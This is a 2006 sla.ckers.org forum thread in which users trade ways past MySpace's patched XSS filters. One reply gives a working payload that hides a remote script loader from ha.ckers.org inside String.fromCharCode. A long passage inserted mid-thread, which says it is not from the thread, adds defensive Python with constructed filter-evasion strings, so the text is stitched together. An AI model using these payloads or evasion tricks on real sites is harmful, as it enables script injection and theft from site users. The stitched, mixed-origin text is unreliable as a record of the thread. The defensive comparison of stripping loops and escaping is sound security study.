Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Myspace again, again.
Posted by: eyeced
Date: December 22, 2006 12:48PM

Well people, it was patched earlier today. And I've been looking at it for about an hour; it's killed me. They seem to have understood the hole and patched it this time. I've tried some pretty crazy XSS evasion and there is no way possible (yet) to connect onload and = together this time.

If anyone does find an exploit for this, please post here, as I owe it to myself to find out! This one's got me stumped; I got annoyed with it, so I started posting in "so it begins" instead... beside the point, anyway reply with information if anyone has managed to circumvent the new filters. They're outrageous!

Re: Myspace again, again.
Posted by: kuza55
Date: December 23, 2006 06:07PM

Here you go: [kuza55.blogspot.com]

Yet another MySpace exploit; at the speed these are coming out, you've got to wonder how the MySpace team must be feeling.

Re: Myspace again, again.
Posted by: maluc
Date: December 23, 2006 11:56PM

Very clever, kuza.. I like it a lot. It goes to show how a hodgepodge of filters can cause some.. unforeseen side effects from their interactions.

-maluc

Re: Myspace again, again.
Posted by: rsnake
Date: December 24, 2006 04:23PM

This is the exact reason you need to use a while loop when you are doing stripping/modification of user input. Just like Forrest Gump might have once said, "XSS filtering is like a box of chocolates. You never know what you're going to get."

- RSnake
Gotta love it. http://ha.ckers.org

Re: Myspace again, again.
Posted by: maluc
Date: December 24, 2006 05:16PM

Indeed, while looping is one of the first things you should learn about filtering =.=

-maluc

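To make the point RSnake and maluc are raising concrete, here is a small added example (not code from the thread, and the denylist in it is a constructed stand-in, not MySpace's real rule set). It contrasts a filter that applies each strip rule exactly once with one that loops until a full pass changes nothing, shows the two ways a single pass leaks (a token nested inside itself, and one rule's removal reassembling a token another rule already checked for, which is the "filter interaction" maluc describes), and then shows the approach that sidesteps the whole problem: encoding the input instead of trying to strip it.

```python
import html
import re

# Constructed denylist, applied in this order by a naive filter.
# Purely illustrative; it is an assumption, not MySpace's actual rule list.
DENYLIST = ["onload", "moz-binding", "script"]


def strip_once(text: str) -> str:
    """Apply every denylist rule exactly once, in order (the fragile pattern)."""
    for word in DENYLIST:
        text = re.sub(re.escape(word), "", text, flags=re.IGNORECASE)
    return text


def strip_until_stable(text: str) -> str:
    """RSnake's point: keep re-running the pass until a whole pass removes nothing.

    Only a fixed point guarantees that no removal has re-exposed a blocked token.
    """
    while True:
        cleaned = strip_once(text)
        if cleaned == text:
            return cleaned
        text = cleaned


def escape_for_html(text: str) -> str:
    """Encode instead of strip: '<', '>', '&' and quotes can no longer form markup,
    so there is nothing for a second pass to re-expose."""
    return html.escape(text, quote=True)


def has_live_handler(markup: str) -> bool:
    """Detection helper: does the text still contain an on...= event handler?"""
    return re.search(r"\bon\w+\s*=", markup, flags=re.IGNORECASE) is not None


# Constructed inputs that show the two single-pass failure modes.
NESTED = "<body ononloadload=alert(1)>"          # token nested inside itself
INTERACTION = "<body onlomoz-bindingad=alert(1)>"  # rule 2's removal rebuilds rule 1's token

if __name__ == "__main__":
    for sample in (NESTED, INTERACTION):
        once = strip_once(sample)
        stable = strip_until_stable(sample)
        print(f"input:         {sample}")
        print(f"single pass:   {once}  live handler: {has_live_handler(once)}")
        print(f"fixed point:   {stable}  live handler: {has_live_handler(stable)}")
        print(f"escaped:       {escape_for_html(sample)}")
        print()
```

Running it shows that a single pass over either sample leaves an intact onload= behind, the fixed-point loop does not, and the escaped form never needed a denylist at all. The loop fixes the specific defect being discussed, but it is still a denylist, so the escaping function is the one to reach for when the input is only ever meant to be displayed as text.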
Re: Myspace again, again.
Posted by: Kyran
Date: December 25, 2006 02:47AM

MySpace, XSS and Forrest Gump?

I thought something more appropriate would be "Stupid is as stupid does."

- Kyran

Re: Myspace again, again.
Posted by: digi7al64
Date: December 25, 2006 06:13AM

Nice find indeed.

It would also appear that you can use document.write with the String.fromCharCode function to add remote JS to bypass the "script" filter... but I guess most people already know this.

<body onLoadmoz-binding="document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,104,97,46,99,107,101,114,115,46,111,114,103,47,115,46,106,115,62,60,47,115,99,114,105,112,116,62));">

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Myspace again, again.
Posted by: OrbityBaby
Date: January 11, 2007 12:15PM

eyeced Wrote:
-------------------------------------------------------
> Well people, it was patched earlier today. And I've
> been looking at it for about an hour; it's killed
> me. They seem to have understood the hole and
> patched it this time. I've tried some pretty crazy
> XSS evasion and there is no way possible (yet) to
> connect onload and = together this time.
>
> If anyone does find an exploit for this, please
> post here, as I owe it to myself to find out!
> This one's got me stumped; I got annoyed with it,
> so I started posting in "so it begins" instead...
> beside the point, anyway reply with information if
> anyone has managed to circumvent the new
> filters. They're outrageous!

Looks like they fixed this again "for good" - LOL. Anyone have any ideas of an exploit to connect onload and = together on MySpace?
